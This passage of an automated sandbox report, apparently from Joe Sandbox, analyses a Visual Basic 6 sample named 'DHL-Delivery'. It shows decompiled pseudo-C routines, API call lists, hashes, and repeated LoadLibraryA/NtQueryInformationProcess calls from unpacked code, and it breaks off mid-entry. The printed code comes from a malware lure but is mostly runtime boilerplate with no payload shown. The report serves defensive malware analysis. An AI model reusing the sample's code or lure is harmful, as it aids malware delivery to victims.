                        				_v124 = 0x8002;
                        				_push( &_v76);
                        				_t54 =  &_v124;
                        				_push(_t54);
                        				L004012FC();
                        				_v132 = _t54;
                        				_push( &_v76);
                        				_push( &_v60);
                        				_push(2);
                        				L0040130E();
                        				_t57 = _v132;
                        				if(_t57 != 0) {
                        					if( *0x412464 != 0) {
                        						_v152 = 0x412464;
                        					} else {
                        						_push(0x412464);
                        						_push(0x40e770);
                        						L004012C6();
                        						_v152 = 0x412464;
                        					}
                        					_t19 =  &_v152; // 0x412464
                        					_v132 =  *((intOrPtr*)( *_t19));
                        					_t63 =  *((intOrPtr*)( *_v132 + 0x14))(_v132,  &_v44);
                        					asm("fclex");
                        					_v136 = _t63;
                        					if(_v136 >= 0) {
                        						_v156 = _v156 & 0x00000000;
                        					} else {
                        						_push(0x14);
                        						_push(0x40e760);
                        						_push(_v132);
                        						_push(_v136);
                        						L004012C0();
                        						_v156 = _t63;
                        					}
                        					_v140 = _v44;
                        					_t57 =  *((intOrPtr*)( *_v140 + 0x118))(_v140,  &_v128);
                        					asm("fclex");
                        					_v144 = _t57;
                        					if(_v144 >= 0) {
                        						_v160 = _v160 & 0x00000000;
                        					} else {
                        						_push(0x118);
                        						_push(0x40e7b8);
                        						_push(_v140);
                        						_push(_v144);
                        						L004012C0();
                        						_v160 = _t57;
                        					}
                        					L00401266();
                        					_v24 = _t57;
                        					L004012A8();
                        				}
                        				_push(0x410f02);
                        				L004012D8();
                        				return _t57;
                        			}

                        APIs
                        • __vbaChkstk.MSVBVM60(?,004011D6), ref: 00410D71
                        • __vbaVarDup.MSVBVM60(?,?,?,?,004011D6), ref: 00410D89
                        • #575.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,?,?,?,004011D6), ref: 00410DA4
                        • __vbaVarTstEq.MSVBVM60(00008002,?), ref: 00410DBF
                        • __vbaFreeVarList.MSVBVM60(00000002,00000002,?,00008002,?), ref: 00410DD2
                        • __vbaNew2.MSVBVM60(0040E770,00412464), ref: 00410DF9
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E760,00000014), ref: 00410E4F
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E7B8,00000118), ref: 00410EAB
                        • __vbaI2I4.MSVBVM60(00000000,?,0040E7B8,00000118), ref: 00410EC2
                        • __vbaFreeObj.MSVBVM60(00000000,?,0040E7B8,00000118), ref: 00410ECE
                        • __vbaFreeVar.MSVBVM60(00410F02), ref: 00410EFC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1737661283.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1737628367.0000000000400000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.1737748460.0000000000412000.00000004.00020000.sdmp
                        • Associated: 00000000.00000002.1737789454.0000000000413000.00000002.00020000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: __vba$Free$CheckHresult$#575ChkstkListNew2
                        • String ID: d$A
                        • API String ID: 360704243-1085024846
                        • Opcode ID: ef63ead78961bfb15b7ad3708dc31e43a80c1ab66d0aa745806fa78e5420dbc6
                        • Instruction ID: fef7fcc809705b90fed205971758a989953b93a4b9bc8cf40fce2cbde63bd8be
                        • Opcode Fuzzy Hash: ef63ead78961bfb15b7ad3708dc31e43a80c1ab66d0aa745806fa78e5420dbc6
                        • Instruction Fuzzy Hash: 1D41FA71900218DFDB10DFA5C986BDDBBB8FF08704F1084AAE105B72A1DBB85A959F64
                        Uniqueness

                        Uniqueness Score: 100.00%

                        C-Code - Quality: 51%
                        			E00410B08(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a44, void* _a60) {
                        				intOrPtr _v8;
                        				intOrPtr _v12;
                        				void* _v36;
                        				void* _v52;
                        				void* _v60;
                        				intOrPtr _v68;
                        				intOrPtr _v76;
                        				intOrPtr* _v80;
                        				signed int _v84;
                        				intOrPtr* _v88;
                        				signed int _v92;
                        				char _v100;
                        				signed int _v104;
                        				signed int _v108;
                        				signed int _t47;
                        				signed int _t52;
                        				intOrPtr _t68;
                        
                        				_push(0x4011d6);
                        				_push( *[fs:0x0]);
                        				 *[fs:0x0] = _t68;
                        				_push(0x58);
                        				L004011D0();
                        				_v12 = _t68;
                        				_v8 = 0x401180;
                        				L004012DE();
                        				L004012DE();
                        				if( *0x412464 != 0) {
                        					_v100 = 0x412464;
                        				} else {
                        					_push(0x412464);
                        					_push(0x40e770);
                        					L004012C6();
                        					_v100 = 0x412464;
                        				}
                        				_t9 =  &_v100; // 0x412464
                        				_v80 =  *((intOrPtr*)( *_t9));
                        				_t47 =  *((intOrPtr*)( *_v80 + 0x14))(_v80,  &_v60);
                        				asm("fclex");
                        				_v84 = _t47;
                        				if(_v84 >= 0) {
                        					_v104 = _v104 & 0x00000000;
                        				} else {
                        					_push(0x14);
                        					_push(0x40e760);
                        					_push(_v80);
                        					_push(_v84);
                        					L004012C0();
                        					_v104 = _t47;
                        				}
                        				_v88 = _v60;
                        				_v68 = 0x80020004;
                        				_v76 = 0xa;
                        				L004011D0();
                        				asm("movsd");
                        				asm("movsd");
                        				asm("movsd");
                        				asm("movsd");
                        				_t52 =  *((intOrPtr*)( *_v88 + 0x13c))(_v88, L"DUMMYSPILLER", 0x10);
                        				asm("fclex");
                        				_v92 = _t52;
                        				if(_v92 >= 0) {
                        					_v108 = _v108 & 0x00000000;
                        				} else {
                        					_push(0x13c);
                        					_push(0x40e7b8);
                        					_push(_v88);
                        					_push(_v92);
                        					L004012C0();
                        					_v108 = _t52;
                        				}
                        				L004012A8();
                        				_push(0x410c3a);
                        				L004012D8();
                        				L004012D8();
                        				return _t52;
                        			}

                        APIs
                        • __vbaChkstk.MSVBVM60(?,004011D6), ref: 00410B23
                        • __vbaVarDup.MSVBVM60(?,?,?,?,004011D6), ref: 00410B3B
                        • __vbaVarDup.MSVBVM60(?,?,?,?,004011D6), ref: 00410B46
                        • __vbaNew2.MSVBVM60(0040E770,00412464,?,?,?,?,004011D6), ref: 00410B5E
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E760,00000014), ref: 00410BA2
                        • __vbaChkstk.MSVBVM60 ref: 00410BC7
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E7B8,0000013C), ref: 00410C03
                        • __vbaFreeObj.MSVBVM60 ref: 00410C14
                        • __vbaFreeVar.MSVBVM60(00410C3A), ref: 00410C2C
                        • __vbaFreeVar.MSVBVM60(00410C3A), ref: 00410C34
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1737661283.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1737628367.0000000000400000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.1737748460.0000000000412000.00000004.00020000.sdmp
                        • Associated: 00000000.00000002.1737789454.0000000000413000.00000002.00020000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: __vba$Free$CheckChkstkHresult$New2
                        • String ID: DUMMYSPILLER$d$A
                        • API String ID: 2652103358-1556165036
                        • Opcode ID: c2a1af7a994a0030077b79652a03899cd34e97ea2d94661043fd18a297dbce0d
                        • Instruction ID: ac648971a3376c084c7d279ba8f58a3cd88c05a30a3448b3089f2d999351de43
                        • Opcode Fuzzy Hash: c2a1af7a994a0030077b79652a03899cd34e97ea2d94661043fd18a297dbce0d
                        • Instruction Fuzzy Hash: E531DE70910248EFDB14EF96C946BDDBBB5BF08708F10442AF501BB2A1D7B82995CB58
                        Uniqueness

                        Uniqueness Score: 100.00%

                        C-Code - Quality: 62%
                        			E00411161(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a20, void* _a36) {
                        				intOrPtr _v8;
                        				intOrPtr _v12;
                        				void* _v24;
                        				void* _v40;
                        				void* _v44;
                        				void* _t12;
                        				intOrPtr _t28;
                        
                        				_push(0x4011d6);
                        				_push( *[fs:0x0]);
                        				 *[fs:0x0] = _t28;
                        				_t12 = 0x1c;
                        				L004011D0();
                        				_v12 = _t28;
                        				_v8 = 0x4011c0;
                        				L004012A2();
                        				L004012DE();
                        				_push(0x40e7cc);
                        				_push(0x40e7cc);
                        				L0040131A();
                        				L00401320();
                        				_push(_t12);
                        				L00401260();
                        				L00401314();
                        				_push(0x4111ec);
                        				L00401314();
                        				L004012D8();
                        				return _t12;
                        			}

                        APIs
                        • __vbaChkstk.MSVBVM60(?,004011D6), ref: 0041117C
                        • __vbaStrCopy.MSVBVM60(?,?,?,?,004011D6), ref: 00411194
                        • __vbaVarDup.MSVBVM60(?,?,?,?,004011D6), ref: 0041119F
                        • __vbaStrCat.MSVBVM60(0040E7CC,0040E7CC,?,?,?,?,004011D6), ref: 004111AE
                        • __vbaStrMove.MSVBVM60(0040E7CC,0040E7CC,?,?,?,?,004011D6), ref: 004111B8
                        • #530.MSVBVM60(00000000,0040E7CC,0040E7CC,?,?,?,?,004011D6), ref: 004111BE
                        • __vbaFreeStr.MSVBVM60(00000000,0040E7CC,0040E7CC,?,?,?,?,004011D6), ref: 004111C6
                        • __vbaFreeStr.MSVBVM60(004111EC,00000000,0040E7CC,0040E7CC,?,?,?,?,004011D6), ref: 004111DE
                        • __vbaFreeVar.MSVBVM60(004111EC,00000000,0040E7CC,0040E7CC,?,?,?,?,004011D6), ref: 004111E6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1737661283.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1737628367.0000000000400000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.1737748460.0000000000412000.00000004.00020000.sdmp
                        • Associated: 00000000.00000002.1737789454.0000000000413000.00000002.00020000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: __vba$Free$#530ChkstkCopyMove
                        • String ID:
                        • API String ID: 409351841-0
                        • Opcode ID: 4f794aad8005d9ab83d62d2e65640dd88a5b1a60d8a1f24d638e0ba262577e9f
                        • Instruction ID: 4cb86aa9483644db274db78c576c34a738887bb7daa32ce1e93ace9c00515eec
                        • Opcode Fuzzy Hash: 4f794aad8005d9ab83d62d2e65640dd88a5b1a60d8a1f24d638e0ba262577e9f
                        • Instruction Fuzzy Hash: DD012831900209AADB04EB93C943EDEB778AB18B48F60446EB501775E1DA786A0586A8
                        Uniqueness

                        Uniqueness Score: 100.00%

                        C-Code - Quality: 66%
                        			E00410C55(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
                        				intOrPtr _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				char _v32;
                        				intOrPtr* _v36;
                        				signed int _v40;
                        				intOrPtr* _v52;
                        				signed int _v56;
                        				char* _t33;
                        				signed int _t36;
                        				void* _t44;
                        				void* _t46;
                        				intOrPtr _t47;
                        
                        				_t47 = _t46 - 0xc;
                        				 *[fs:0x0] = _t47;
                        				L004011D0();
                        				_v16 = _t47;
                        				_v12 = 0x401190;
                        				_v8 = 0;
                        				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x20,  *[fs:0x0], 0x4011d6, _t44);
                        				if( *0x412010 != 0) {
                        					_v52 = 0x412010;
                        				} else {
                        					_push(0x412010);
                        					_push(0x40e9a0);
                        					L004012C6();
                        					_v52 = 0x412010;
                        				}
                        				_t33 =  &_v32;
                        				L004012CC();
                        				_v36 = _t33;
                        				_t36 =  *((intOrPtr*)( *_v36 + 0x22c))(_v36, _t33,  *((intOrPtr*)( *((intOrPtr*)( *_v52)) + 0x304))( *_v52));
                        				asm("fclex");
                        				_v40 = _t36;
                        				if(_v40 >= 0) {
                        					_v56 = _v56 & 0x00000000;
                        				} else {
                        					_push(0x22c);
                        					_push(0x40e6b4);
                        					_push(_v36);
                        					_push(_v40);
                        					L004012C0();
                        					_v56 = _t36;
                        				}
                        				L004012A8();
                        				_push(0x410d2d);
                        				return _t36;
                        			}

















                        APIs
                        • __vbaChkstk.MSVBVM60(?,004011D6), ref: 00410C71
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010,?,?,?,?,004011D6), ref: 00410CA8
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410CD5
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6B4,0000022C), ref: 00410D06
                        • __vbaFreeObj.MSVBVM60 ref: 00410D17
                        Memory Dump Source
                        • Source File: 00000000.00000002.1737661283.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1737628367.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.1737748460.0000000000412000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.1737789454.0000000000413000.00000002.00020000.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: __vba$CheckChkstkFreeHresultNew2
                        • String ID:
                        • API String ID: 4127847336-0
                        • Opcode ID: 39ba9c7af6e8c22363db470fde4a21d854952ad7a012dacb62282482d9e336fd
                        • Instruction ID: 9224f88870c14887c820cadec0ac31f95736c34fd9e95cd02b83149658af814e
                        • Opcode Fuzzy Hash: 39ba9c7af6e8c22363db470fde4a21d854952ad7a012dacb62282482d9e336fd
                        • Instruction Fuzzy Hash: 4321E474A00208AFCB00EFA5D949BDDBBB5BB08704F20456AF501BB2A1D7B96990DB59
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Execution Graph

                        Execution Coverage:0.1%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:58
                        Total number of Limit Nodes:10


                        Executed Functions

                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 896f70a04c8111f74db821c52fab5d1e154c25d88d50ff43e956975f09deb84c
                        • Instruction ID: 0ddf83902a3c455f76821eb3cc2916cc6537d5395a6db1502cec8e90a83047fa
                        • Opcode Fuzzy Hash: 896f70a04c8111f74db821c52fab5d1e154c25d88d50ff43e956975f09deb84c
                        • Instruction Fuzzy Hash: 0C813161708206DDEF34196489A83FA3E96BF56765FF44E2BDC43D3290E72188C5AA03
                        Uniqueness

                        Uniqueness Score: 37.75%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 3eb64fe21dfaf8b76e94c9f2915cc84b43d948cd63066a1ce9831e154702ed7c
                        • Instruction ID: 203dad6a4b0fad1bc979f387b97b77c6e388325f71e989560cccb93645c567de
                        • Opcode Fuzzy Hash: 3eb64fe21dfaf8b76e94c9f2915cc84b43d948cd63066a1ce9831e154702ed7c
                        • Instruction Fuzzy Hash: BC611521748202CEFF25586489A83F53E92BB56725FF44E5BCC53D3290D32688C6EE53
                        Uniqueness

                        Uniqueness Score: 37.75%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 33fa997b4eaedfaeaf85df6154c1009582ec7c89f5ef5ea53e3d72fc886fd1c0
                        • Instruction ID: b5659ad08a3c02c9b05b22512ee5850cb4c6394010f3221b578d7bf9cd4dea49
                        • Opcode Fuzzy Hash: 33fa997b4eaedfaeaf85df6154c1009582ec7c89f5ef5ea53e3d72fc886fd1c0
                        • Instruction Fuzzy Hash: 63510421748202CEFF254864C9A83F53E96BB66325FF44E5ACC53D7690D32288C5EE43
                        Uniqueness

                        Uniqueness Score: 37.75%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: cbab3948758985fc6100f52a14e0bf02b1c8c1f87ccd4b34b389c7c2939f1903
                        • Instruction ID: c211825dc949681975e9427405d90be130bee7b2647a5c723a8bb0ed58bef75e
                        • Opcode Fuzzy Hash: cbab3948758985fc6100f52a14e0bf02b1c8c1f87ccd4b34b389c7c2939f1903
                        • Instruction Fuzzy Hash: CA510221748202DEFF25582489A83FA3E52BB56325FF94E1BCC53D3690D32288C5EE43
                        Uniqueness

                        Uniqueness Score: 37.75%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 307032cf83ac37437a58e4f1d7e67b0124bc1c1209b63b3e7e7a254ba8387013
                        • Instruction ID: e3d0457bd2bfe2ddb381f8bf937cd3e2b638098d4cf34212f535cea54fcdb324
                        • Opcode Fuzzy Hash: 307032cf83ac37437a58e4f1d7e67b0124bc1c1209b63b3e7e7a254ba8387013
                        • Instruction Fuzzy Hash: FF51F221708202DEFF25596489A83F93E56BB56325FF94E1BCC53D3690D32289C5EE43
                        Uniqueness

                        Uniqueness Score: 37.75%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: b1607fdb6e14463424f667e8ad498bfda36d134281ee51dcaa9ef00926f392f2
                        • Instruction ID: 4c74bfae46ffbca09d90c8c5f00833d291fd0ceeea951fa5a28c84ee4f235c50
                        • Opcode Fuzzy Hash: b1607fdb6e14463424f667e8ad498bfda36d134281ee51dcaa9ef00926f392f2
                        • Instruction Fuzzy Hash: B051D021708206DEFF25595489A83FA3E96BB56325FF94E1BCC53D7690D32288C5EE03
                        Uniqueness

                        Uniqueness Score: 37.75%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 33823adfeeef93589b3cb69c0f9fba759bb1a701aedd3780751b4b86a78e270a
                        • Instruction ID: 86c4700e693396ad627f1915a59a0fa176bec3a658d579f97a8c94c104405dd3
                        • Opcode Fuzzy Hash: 33823adfeeef93589b3cb69c0f9fba759bb1a701aedd3780751b4b86a78e270a
                        • Instruction Fuzzy Hash: 0951E221748202DEFF25595489A83FA3E56BB56725FE54E1BCC53D3690D32288C5EE03
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 29b1de2919b8d6cc93aa37c3255af532ef7e0e6b1d8c5c18a1f160a5264f6e80
                        • Instruction ID: 0a7f72c52536e29ce2d348fd4c867cbfc3753be521066b8148c43e5ed6030559
                        • Opcode Fuzzy Hash: 29b1de2919b8d6cc93aa37c3255af532ef7e0e6b1d8c5c18a1f160a5264f6e80
                        • Instruction Fuzzy Hash: 5D51E121748202DEFF254964C9A83F93E56BB56321FE94E1BCC53D3690D32288C5EE43
                        Uniqueness

                        Uniqueness Score: 0.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 0b9867b7c2af50e2d8ba6e327d3a633b01b95a75b120d67947f6d37e86498dad
                        • Instruction ID: 730df956de8665c5c49c316a2119dc34ee4b5dc33736ec8fbdec26f3c5a793d4
                        • Opcode Fuzzy Hash: 0b9867b7c2af50e2d8ba6e327d3a633b01b95a75b120d67947f6d37e86498dad
                        • Instruction Fuzzy Hash: B0514921749202CEFF255964C8983E93E52BB66720FE84E5BCC13C72A0D37289C5DE53
                        Uniqueness

                        Uniqueness Score: 37.75%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 865edabb9364f581e5915951b44b5d2f7d47f0cd152be1b672ee6286ff684274
                        • Instruction ID: 0fb0a14e1a907e781248ea791d3e6782316bbb691786dc961a4f67188c49b096
                        • Opcode Fuzzy Hash: 865edabb9364f581e5915951b44b5d2f7d47f0cd152be1b672ee6286ff684274
                        • Instruction Fuzzy Hash: C851E321748202DEFF255954C9A83F93E56BB56321FE94E5BCC53D3690D32289C5EE03
                        Uniqueness

                        Uniqueness Score: 37.75%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 6b1361e92a30c5b006144887ee9fd6e4d01c40c4998d76e50dcf8bad1349cc06
                        • Instruction ID: 32059dd535e05b3552b81ea1ae15e5dd33276707dfb919dde76fd59f88ea3d9f
                        • Opcode Fuzzy Hash: 6b1361e92a30c5b006144887ee9fd6e4d01c40c4998d76e50dcf8bad1349cc06
                        • Instruction Fuzzy Hash: B4510521748202DDFF255964C9A83F93E56BB56321FE94E1BCC53D3690D32289C5EE43
                        Uniqueness

                        Uniqueness Score: 37.75%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 5042268bd934bf64ec282b4b970db24867b769db0abf47448fab1b3e78c12390
                        • Instruction ID: ff0f1b7bddef909895cf131f7ebecdb95b1bba38f7edb784a92df9f007833857
                        • Opcode Fuzzy Hash: 5042268bd934bf64ec282b4b970db24867b769db0abf47448fab1b3e78c12390
                        • Instruction Fuzzy Hash: 0651D221748202DDFF255964C9A83FA3E56BB66725FE94E1BCC53D3690E32188C5EE03
                        Uniqueness

                        Uniqueness Score: 37.75%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 172e1603a599af3b2ebae7b6a6ab1f4b7a1d2993e6de23f9f6f130c09e8ffdbc
                        • Instruction ID: 68138c43901d7c825ae80bae9cb1517128ce553a00c6e24ac10125674c37826e
                        • Opcode Fuzzy Hash: 172e1603a599af3b2ebae7b6a6ab1f4b7a1d2993e6de23f9f6f130c09e8ffdbc
                        • Instruction Fuzzy Hash: C351F221708202DDFF254910C9A83FA3E56BB66321FE94E1BCC53D3290D32289C5EE03
                        Uniqueness

                        Uniqueness Score: 37.75%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: d3f13fe32707233e91437013c5ecad6eda1526f39ff7fa4042b76ed83a512597
                        • Instruction ID: 3d7332bfe933f72705c61d6842d46c34e1602670f7475be206a009f6aa5d79d9
                        • Opcode Fuzzy Hash: d3f13fe32707233e91437013c5ecad6eda1526f39ff7fa4042b76ed83a512597
                        • Instruction Fuzzy Hash: 90513A21748212DDFF255964C9A83E63E52BB66730FE54E5BCC13C72A0D37289C5DA43
                        Uniqueness

                        Uniqueness Score: 37.75%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 4293931881aac80274d1db611e855c65573b8ac06396e112104285d0408fba49
                        • Instruction ID: 555c26a5d46105961438dfe2945ca888a564796e8e983ddbaa556a2f8299aab1
                        • Opcode Fuzzy Hash: 4293931881aac80274d1db611e855c65573b8ac06396e112104285d0408fba49
                        • Instruction Fuzzy Hash: C8517821749252CEFF214924C8A83EA3E52FB26730FE44E5ACC12C72A0D37285C5DA43
                        Uniqueness

                        Uniqueness Score: 37.75%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: f471512631044738e25c17e7a83ab6c51636d207b5d4c2dadba64dd3ac7dac1c
                        • Instruction ID: 61c7462110d1bbd858dfa8964a9900d85c02d8b6f4229a274316fe6b95768399
                        • Opcode Fuzzy Hash: f471512631044738e25c17e7a83ab6c51636d207b5d4c2dadba64dd3ac7dac1c
